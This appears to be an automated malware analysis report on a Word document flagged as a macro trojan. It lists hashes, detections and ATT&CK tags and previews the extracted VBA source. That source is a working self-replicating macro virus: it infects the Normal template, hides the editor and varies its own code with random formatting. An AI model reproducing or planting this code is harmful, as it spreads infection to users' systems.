Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9dd5dea0a2190e95…

MALICIOUS

Office (OLE)

43.5 KB Created: 2000-01-11 21:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 73105d437457c4a78b1fba59da7a8d20 SHA-1: 0d4f3048e53a07ba128844f28299c16892cde4e7 SHA-256: 9dd5dea0a2190e95df75e5f6d4e81c18bb05e1e2792fc181fd42f46c544f1956
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros. The 'OLE_VBA_SHELL' heuristic firing indicates the use of the Shell() function, which is commonly used to execute arbitrary commands or download additional payloads. The presence of VBA macros and the Shell() function strongly suggests a macro-based malware delivery mechanism, likely initiated via spearphishing.

Heuristics 3

  • ClamAV: Doc.Trojan.Ded-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ded-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21447 bytes
SHA-256: 3739e6a44616f51c2be42e6f036ef019412388ad6cde31bc9c181c9b4d3172c4
Detection
ClamAV: Doc.Trojan.Ded-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
            Private Sub _
Document_New()

       End Sub
'36.40187
              Private Sub _
Document_Close()

    On Error GoTo skam
'38.20107
      Options. _
                             VirusProtection = True

   SWL
'63.31789
   ABS99
'90.57298
skam:
'63.17424
        End Sub
'2.26292
    Private _
Sub SWL()

  Application. _
                                     ShowVisualBasicEditor = False

     If _
Not ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

For I = 1 To NormalTemplate.VBProject.VBComponents(1). _
      CodeModule.CountOfLines

           d = _
NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

 If _
Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

     While _
Mid(d, Len(d) - 1, 2) = " _"

   I _
= I + 1

        d = _
Left(d, Len(d) - 1) & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

            Wend
'84.72455
       d = _
e(d)

    ActiveDocument. _
                                   VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d

             End If
'36.34587
           Next _
I

        ActiveDocument. _
                                                   SaveAs AddToRecentFiles:=False

           End If
'90.30988
              End Sub
'27.52955
   Private Sub ABS99()
'97.29667
           If Not NormalTemplate. _
      VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then

 f (NormalTemplate. _
                      FullName)

  For _
I = 1 To ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines

    d _
= ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

   If _
Len(d) > 0 And Not d = " " And Not d = " _" And Not d = "" And Not Mid(d, 1, 1) = "'" Then

             While _
Mid(d, Len(d) - 1, 2) = " _"

            I = I + 1
'74.23421
             d = Left(d, Len(d) - _
1) & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)

      Wend
'7.495034
       d = _
e(d)

  NormalTemplate. _
VBProject.VBComponents(1).CodeModule.InsertLines I * 2, d

 End _
If

Next I
'47.13914
           NormalTemplate.Save
'82.7899
            End _
If

        End _
Sub

            Private Function e(aString) As _
String

       aString = LTrim(aString)
'26.80438
              aString = _
RTrim(aString)

         If _
aString = "Sub " & "Vc()" Then

           aString _
= "Sub " & "ViewVBCode()"

         Else
'31.18372
    If aString = "Sub " & "ViewVBCode()" Then
'45.09994
           aString _
= "Sub " & "Vc()"

   End If
'6.985104
   End If
'92.54505
   For I = 1 To _
Len(aString) - 1

           If Mid(aString, I, 1) _
= "." Then

      If Not Mid(aString, _
I - 1, 1) = Chr$(34) And Not Mid(aString, I + 1, 1) = Chr$(34) And Int(3 * Rnd) = 1 Then

              If Not _
Mid(aString, I + 1, 1) = Chr$(34) Then

         e _
= Left(aString, I - 1) & ". _" & Chr$(13) & Right(aString, Len(aString) - I)

        For _
j = 1 To Int(15 * Rnd)

     e = " " & _
e

  Next j
'37.77427
             Exit Function
'4.393273
       End If
'20.96745
     End _
If

         Else
'53.82507
 If Mid(aString, I, _
1) = " " And Int(3 * Rnd) = 1 And I > 1 Then

         If Not Mid(aString, _
I + 1, 1) = Chr$(34) And Not Mid(aString, I - 1, 1) = Chr$(34) Then

         e = Left(aString, I _
- 1) & " _" & Chr$(13) & Right(aString, Len(aString) - I)

            For _
j = 1 To Int(15 * Rnd)

         e = " " & _
e

     Next j
'29.1052
      Exit Function
'76.98775
        End If
'17.76208
 End If
'43.15423
 End _
If

       Next I
'41.63005
      e _

... (truncated)